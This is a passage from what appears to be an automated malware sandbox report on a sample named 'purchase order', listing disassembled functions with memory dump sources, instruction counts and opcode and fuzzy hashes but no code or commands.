                                                                                                              • Opcode Fuzzy Hash: 8dd22365092fc0ba0a4bb577f49278afc912a545fe1a00b09e3b9a0ce651666b
                                                                                                              • Instruction Fuzzy Hash: 3E81F2387106108FCB18EF68D998D697BF6BF89B04B1141A9EA06CB375DB71EC45CB90
                                                                                                              Function 04AFF6A0 Relevance: .2, Instructions: 210COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9e39597d3856a1992f922e9273e5bf36b3b938e0a52a6ca243e7128b8f91d666
                                                                                                              • Instruction ID: 36136de82d0d4ef82aa50a2aa48eb1db5d052793223d0d991ab9791f373e534e
                                                                                                              • Opcode Fuzzy Hash: 9e39597d3856a1992f922e9273e5bf36b3b938e0a52a6ca243e7128b8f91d666
                                                                                                              • Instruction Fuzzy Hash: 47815135A10609DFCB04EFA4D8589ADBBB5FF89304F11856AF502AB364EB70A945CF90
                                                                                                              Function 04AFEB88 Relevance: .1, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6f255ff0ab25ab985c38aa56d99cfee123ff8e2d39659e5ff347e1950e16cf2b
                                                                                                              • Instruction ID: e62b931ab7c082d048d2a9baa87adca96942ffa256a85905cc7dde08395df7d2
                                                                                                              • Opcode Fuzzy Hash: 6f255ff0ab25ab985c38aa56d99cfee123ff8e2d39659e5ff347e1950e16cf2b
                                                                                                              • Instruction Fuzzy Hash: 31411530B142589FDB14DBA9C894AAEBBF6BF49705F1540A9F605EB361DA31E801CB90
                                                                                                              Function 04AFBBF0 Relevance: .1, Instructions: 124COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ae25014a3bb05a8a0432a93bf1a32869e32db407b7335e9b7a7416da741f0671
                                                                                                              • Instruction ID: 78e9c7c8501f7c5b4b11cccf13c7482783ae18a6d9e0b5a05403336705ebec78
                                                                                                              • Opcode Fuzzy Hash: ae25014a3bb05a8a0432a93bf1a32869e32db407b7335e9b7a7416da741f0671
                                                                                                              • Instruction Fuzzy Hash: 4A418735A01109CFEB28EFB4C8547EEBAB1EB88318F144469E60567354DF34A986CBE5
                                                                                                              Function 04AF453F Relevance: .1, Instructions: 117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bd3cea8f803e538039a927849bac2114316bcd167a77c9e6c4be5f7aa554d97
                                                                                                              • Instruction ID: ca79c909d3bdfad0d2b80ac7f588f76f762e542df9cbe83c03a0af702a2ffb2b
                                                                                                              • Opcode Fuzzy Hash: 4bd3cea8f803e538039a927849bac2114316bcd167a77c9e6c4be5f7aa554d97
                                                                                                              • Instruction Fuzzy Hash: F0412770600219DFDF059FA5D844AAEBBA6FF98300F148525F9129B3A4DB34ED56CB90
                                                                                                              Function 04AFEF61 Relevance: .1, Instructions: 107COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cde9ad1007642347ada2c7bfc5100f91ad04024ab38ad90ee8d32ae0b200a1a
                                                                                                              • Instruction ID: 432c0e422118211b86723e084596622b1edf3422cf46e1bd9bf68c3aa77b31fa
                                                                                                              • Opcode Fuzzy Hash: 8cde9ad1007642347ada2c7bfc5100f91ad04024ab38ad90ee8d32ae0b200a1a
                                                                                                              • Instruction Fuzzy Hash: FB416D319106099FDB00EFA8D9949DDBBB1FF49301F00822AF945B7250FB30AA89CB90
                                                                                                              Function 04AFB954 Relevance: .1, Instructions: 107COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 88a2e24dcc7579f4813d90a2ee0f2d97181890d8362d5d1a34838b14ff56df8d
                                                                                                              • Instruction ID: 72dba51310d5c08b02f7223d21030687a0bce549f37432993cbf25fc218c16f4
                                                                                                              • Opcode Fuzzy Hash: 88a2e24dcc7579f4813d90a2ee0f2d97181890d8362d5d1a34838b14ff56df8d
                                                                                                              • Instruction Fuzzy Hash: D0315070B002159FDB14AFBAC9549BFBBFAEFC4344B10882AA515D7251EB34ED058790
                                                                                                              Function 04AF1C6C Relevance: .1, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d06b341cf7999fe32d26a849f57d755957580c497254324ceebcbb1cdd760db3
                                                                                                              • Instruction ID: 1667f2db59f2ffbe2c9af32a92649281a63037b75f75c3a7439a713b4a89a61c
                                                                                                              • Opcode Fuzzy Hash: d06b341cf7999fe32d26a849f57d755957580c497254324ceebcbb1cdd760db3
                                                                                                              • Instruction Fuzzy Hash: 8541D2B1D00209DBDB20DFE9C984ADDBBB5BF48304F24842AE418BB215D7756A46CF91
                                                                                                              Function 04AF1C78 Relevance: .1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd88c2acabf506361dafeb187fbf254a6ac98145519e2ea9bd000b82c591f688
                                                                                                              • Instruction ID: 92af481d2ae9718c2c68831a6357d2225c0841f4e2b9eea8cf6f769b1d1d3ad8
                                                                                                              • Opcode Fuzzy Hash: bd88c2acabf506361dafeb187fbf254a6ac98145519e2ea9bd000b82c591f688
                                                                                                              • Instruction Fuzzy Hash: 8641B2B1D00209DBDB24DFE9C984ADDBBB5BF48304F64802AE518BB214D7756A46CF91
                                                                                                              Function 04AFB948 Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e494c78df1d769c1dee0127110ae08dfa65ba3750d13c8e195a9be088eebf4a3
                                                                                                              • Instruction ID: c6559ca43cd9e1e921ddc5199751f517081c53930f0be70d63f135535946db2c
                                                                                                              • Opcode Fuzzy Hash: e494c78df1d769c1dee0127110ae08dfa65ba3750d13c8e195a9be088eebf4a3
                                                                                                              • Instruction Fuzzy Hash: 8241BFB0D1035C9BDB14CFDAC884A9EFBB5BF89714F20812AE418BB220D774A845CF91
                                                                                                              Function 04AFBBE1 Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 78bf7c23d75b765d9a7b9ee47633fd4575cdb20d260381dd20eea33a4b24c51b
                                                                                                              • Instruction ID: 71b9c5babd9f0562fb01096d6cfe7124dec2677af863d2747f2f9a4fe3bca1f4
                                                                                                              • Opcode Fuzzy Hash: 78bf7c23d75b765d9a7b9ee47633fd4575cdb20d260381dd20eea33a4b24c51b
                                                                                                              • Instruction Fuzzy Hash: FF31B974900105CFEB28EFB4C8557EE7BB1EB48318F108469D60567384DE35A9868BE6
                                                                                                              Function 04AF3D97 Relevance: .1, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a06aa6c9c8839cddedfa10638d337e4bb34d98178c3867c47ef945fb9fb1f8f1
                                                                                                              • Instruction ID: 5954cd0eedab45574e6f56653782c80f5228f45d2864ad374ec90d86ef411bb7
                                                                                                              • Opcode Fuzzy Hash: a06aa6c9c8839cddedfa10638d337e4bb34d98178c3867c47ef945fb9fb1f8f1
                                                                                                              • Instruction Fuzzy Hash: 6F310171A012189FDF01EFA8DC449DD7FB2EF49310F04406AE901AB262D730ED56CB61
                                                                                                              Function 04AFF691 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aae3e18db78af9374cf6d64b9f246fd34ad5ff64d2b543f85a8cc86f4f8284a9
                                                                                                              • Instruction ID: 6cb2a4a686ec66db0922ddf0657c2e7ef3d8d659f7a2198ec82cd8c88d29d730
                                                                                                              • Opcode Fuzzy Hash: aae3e18db78af9374cf6d64b9f246fd34ad5ff64d2b543f85a8cc86f4f8284a9
                                                                                                              • Instruction Fuzzy Hash: 1431D675A10605DFDB14EFA4C8549EDBBB1FF89304F048129F5066B364EB70A986DF80
                                                                                                              Function 04AF8AF0 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd40fc805a4db854bd4afd80ae543a5464b58fc107fa086e30943968a145e5f2
                                                                                                              • Instruction ID: 950ddd9c260aafd225ddf4460a968a6f713746c1aff6cf450e3f875c6be516d8
                                                                                                              • Opcode Fuzzy Hash: fd40fc805a4db854bd4afd80ae543a5464b58fc107fa086e30943968a145e5f2
                                                                                                              • Instruction Fuzzy Hash: 2C310675A50219DFDB04DFA9D994EEDB7B9FF88704F1182A9E915AB360D730A800CF90
                                                                                                              Function 04AFACF0 Relevance: .1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb85f3a441cb1c2c247b88fead4ffaf79c008df70e53d0e299e6a56427180d0f
                                                                                                              • Instruction ID: dba72ad1b58165553f68e73b9341a7a5853a35c1f6e54d3bc4a0ba6ef8dfa910
                                                                                                              • Opcode Fuzzy Hash: fb85f3a441cb1c2c247b88fead4ffaf79c008df70e53d0e299e6a56427180d0f
                                                                                                              • Instruction Fuzzy Hash: E521D3303017008BE329ABB5895066677EAAFC5249705487DE947CB3A1EF69E807C751
                                                                                                              Function 04AF9B60 Relevance: .1, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bfab9d4fca799fbd34d226c9cfc9ec4d35cb8e2379c4a1d092a513a77cf01a11
                                                                                                              • Instruction ID: 9956456a5e82a0bcceb8d7bb7727bf48808a81b0f8f7ba5cddfd654b79e80f8e
                                                                                                              • Opcode Fuzzy Hash: bfab9d4fca799fbd34d226c9cfc9ec4d35cb8e2379c4a1d092a513a77cf01a11
                                                                                                              • Instruction Fuzzy Hash: B72138B67102104FEB248F65C8C167FB7EAEBC4314B28806AE646D3665D634F9868751
                                                                                                              Function 04AFCC9A Relevance: .1, Instructions: 79COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 88d5b1f548e9906c99caa98b7a2c864fe02bce2192f52e5bdc80063f3f210dca
                                                                                                              • Instruction ID: 1afe131d7626daa48f4b801abf69ae3390e3ce6c9263be905550df51eb294851
                                                                                                              • Opcode Fuzzy Hash: 88d5b1f548e9906c99caa98b7a2c864fe02bce2192f52e5bdc80063f3f210dca
                                                                                                              • Instruction Fuzzy Hash: 12218371B001159FDB14DFA9CD409BFBBFAAFC4344F14851AE514D3251EB30AA018BA0
                                                                                                              Function 04AF9B70 Relevance: .1, Instructions: 79COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c7c33ffaf75f1942d61fb611804278907e51a9f94e29cb3e5f79dc61bd27a895
                                                                                                              • Instruction ID: 7be1ab5cbe2ec280c6e77c6d9a991b4efd94143ae837edf1fc991a71ea3805b9
                                                                                                              • Opcode Fuzzy Hash: c7c33ffaf75f1942d61fb611804278907e51a9f94e29cb3e5f79dc61bd27a895
                                                                                                              • Instruction Fuzzy Hash: 0321D7B67106104FEB289F65C881A7FB7EAEBC4314F288429E646D3764D634FD818761
                                                                                                              Function 04AFB400 Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b9ea1e9054a95b66cc6628c0470392195a4fe3a0f923361d6f1a60d0144f032d
                                                                                                              • Instruction ID: 038730ac185dabecc46db310696548ca33845ce31df7f2cda142d29dcc6760b4
                                                                                                              • Opcode Fuzzy Hash: b9ea1e9054a95b66cc6628c0470392195a4fe3a0f923361d6f1a60d0144f032d
                                                                                                              • Instruction Fuzzy Hash: 39217A34B106108FCB05DB68D898DAD7BF6AF8970470541AAFA06CB371DB71EC02CB90
                                                                                                              Function 04AFC994 Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: baf3d92a962e064d3987564baf597ea21155287501bed5e8ea987cc2412e1e67
                                                                                                              • Instruction ID: 6ecb08290ae801a45ea94da6a5ed050b11978d76a847a4818128cc4c52f98f67
                                                                                                              • Opcode Fuzzy Hash: baf3d92a962e064d3987564baf597ea21155287501bed5e8ea987cc2412e1e67
                                                                                                              • Instruction Fuzzy Hash: 9321F975E0021A8FDF05DBB8C8806EEB7F7BF88314B148126D505E7255EB34AA06C7A1
                                                                                                              Function 0076D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1a0708df2f0fd385b5b556e7ef2269d8cce2a3d45a08861550809eea46bd1c8b
                                                                                                              • Instruction ID: 06ae0fe2edb58cbed96e4b2555977f5386d05e23c3cb4fb7b12661982dfbafa5
                                                                                                              • Opcode Fuzzy Hash: 1a0708df2f0fd385b5b556e7ef2269d8cce2a3d45a08861550809eea46bd1c8b
                                                                                                              • Instruction Fuzzy Hash: 472148B1A10284DFCB20DF04C9C0F16BF65FB98314F24C169DC0A4B256C73AEC46C6A1
                                                                                                              Function 0076D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aed9fadcbb994c73e9c1f75ae978867d0fb3c55a27fe61a44b5d915a713044bd
                                                                                                              • Instruction ID: 2c85d42abd4bb54e46e32020edb02303420e125d3f5d82eceed13ef3e464f386
                                                                                                              • Opcode Fuzzy Hash: aed9fadcbb994c73e9c1f75ae978867d0fb3c55a27fe61a44b5d915a713044bd
                                                                                                              • Instruction Fuzzy Hash: 8521F171A10240DFCB25DF14D9C0B26BF65FB98318F24C569EC0B4A656C33ADC66CAA1
                                                                                                              Function 0077D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838380085.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ca78977fec8b1d171bed5142847b6d98cf849da9c4dd9ea1dd0f790152f5281a
                                                                                                              • Instruction ID: 034e3496f57f02fa187171c5a2e2bfbf76e2c032725ca0cda450f8bc71460756
                                                                                                              • Opcode Fuzzy Hash: ca78977fec8b1d171bed5142847b6d98cf849da9c4dd9ea1dd0f790152f5281a
                                                                                                              • Instruction Fuzzy Hash: 3E21D071604204EFDF25DF14D980B26BBB5FF88354F24C6A9E94D4B296C33ADC46CA61
                                                                                                              Function 0077D01C Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838380085.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1357ad43f79d67833ab9ca7554b24dcb6fb65d4a1bce5707c2b5925b298c43e8
                                                                                                              • Instruction ID: 42e9a6d3a339cd673889d538baee4d14e7f27b6759e96bb6455ceacf4a789113
                                                                                                              • Opcode Fuzzy Hash: 1357ad43f79d67833ab9ca7554b24dcb6fb65d4a1bce5707c2b5925b298c43e8
                                                                                                              • Instruction Fuzzy Hash: B521DE75604204DFCF24DF24DA84B26BBB5EF88354F24C569E80E4B296C33ADC46CA61
                                                                                                              Function 04AF19FC Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5689d450abbe1256bc05aad37141def6e71594354524d5f51b0893f97ecdee33
                                                                                                              • Instruction ID: c6121d0dcc94d5104c0f9cb3e44cb2fa7c816e3538dcd1ce57dde1ec3f75aa5c
                                                                                                              • Opcode Fuzzy Hash: 5689d450abbe1256bc05aad37141def6e71594354524d5f51b0893f97ecdee33
                                                                                                              • Instruction Fuzzy Hash: 5131F4B0D01258DFEB20DF99C988BCEBFF5AB08314F548559E904BB250D7B56886CF91
                                                                                                              Function 04AF0C14 Relevance: .1, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbf3ae21fae57e765221c1bd89171096e8df6b9e6db49d148a549e9c1eefc393
                                                                                                              • Instruction ID: 90a34b6b23de6c6135151f4f6a1d0b3d3209700d118300808200c612c0eb132b
                                                                                                              • Opcode Fuzzy Hash: dbf3ae21fae57e765221c1bd89171096e8df6b9e6db49d148a549e9c1eefc393
                                                                                                              • Instruction Fuzzy Hash: 5B31E0B0D01258DFEB20DFDAC988B9EBFF5AB08314F648159E508BB250D7B56885CF91
                                                                                                              Function 04AF1848 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 91087aca7cbc970241d19a5cb23bc9ed189cf8b9c79f9dafebc8c5561a86321e
                                                                                                              • Instruction ID: 2717ad1514900fcaad8a160bb2f7e7df419b29d86063996a372ae6a36cae1fea
                                                                                                              • Opcode Fuzzy Hash: 91087aca7cbc970241d19a5cb23bc9ed189cf8b9c79f9dafebc8c5561a86321e
                                                                                                              • Instruction Fuzzy Hash: 0711C2B2E002198F9B11EFB99C404BFB7F7EFC42607144929E519D7340EB30AE0A87A0
                                                                                                              Function 04AF9418 Relevance: .1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5385722e6385ab72e8ebd9c99178379c47e0d1044942d8e7cdbbdf38fd5d91c9
                                                                                                              • Instruction ID: fd18f7b6821029b2d71de69dc43ff9c400c0d99edb03174ea464d2dcf15e7dae
                                                                                                              • Opcode Fuzzy Hash: 5385722e6385ab72e8ebd9c99178379c47e0d1044942d8e7cdbbdf38fd5d91c9
                                                                                                              • Instruction Fuzzy Hash: 851182B5A002059FDB12DF68D8806AF7BF9FF58301F004425F918C7261D734E9158BA1
                                                                                                              Function 04AF9CB2 Relevance: .1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9f1ba5c1180ea9f7b5147287a888e226699d7195aace480af371adb406acd730
                                                                                                              • Instruction ID: 920a04c7463685600f8fe8c8678a79df1d1c3ec8e7fb842130a8ef772a3ea2d4
                                                                                                              • Opcode Fuzzy Hash: 9f1ba5c1180ea9f7b5147287a888e226699d7195aace480af371adb406acd730
                                                                                                              • Instruction Fuzzy Hash: D211CEB5E001199FCB44CFADD4419AEBBF5FF88310B10816AE919E7311D7309911CB91
                                                                                                              Function 0076D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction ID: 4dd99e69990244780578a81829675d19f680ee0ea7c4e29680fbc1a8a804b5ce
                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction Fuzzy Hash: 6E11A276904280CFCB15CF14D5C4B16BF71FB94314F24C5A9DC460B656C33AD866CB91
                                                                                                              Function 0076D3D3 Relevance: .1, Instructions: 56COMMON
